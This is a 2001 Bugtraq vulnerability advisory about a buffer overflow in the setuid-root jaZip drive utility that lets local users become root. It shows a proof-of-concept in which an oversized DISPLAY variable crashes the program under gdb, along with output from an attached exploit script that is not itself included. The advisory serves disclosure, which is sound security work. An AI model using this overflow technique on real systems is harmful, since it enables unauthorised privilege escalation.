|
|
Home : Advisories : Vulnerability in jaZip
| Title: |
Vulnerability in jaZip |
| Released by: |
teleh0r |
| Date: |
15th January 2001 |
| Printable version: |
Click here |
Dear, Bugtraq.
jaZip is a program for managing an Iomega Zip or Jaz drive.
It is often installed setuid root - and because of a buffer
overflow it is possible for regular users to become root.
Please excuse me if this was know. Please note that I can not
guarantee that this information is correct.
Tested rpm:
http://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/
RPMS/jaZip-0.32-2.i386.rpm
[root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
[root@localhost /root]# gdb /usr/X11R6/bin/jazip
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
(gdb) r
Starting program: /usr/X11R6/bin/jazip
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
----
[teleh0r@localhost teleh0r]$ rpm -q jaZip
jaZip-0.32-2
[teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
Address: 0xbffff7ac
bash#
Exploit attached.
Sincerely yours,
teleh0r
--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
|
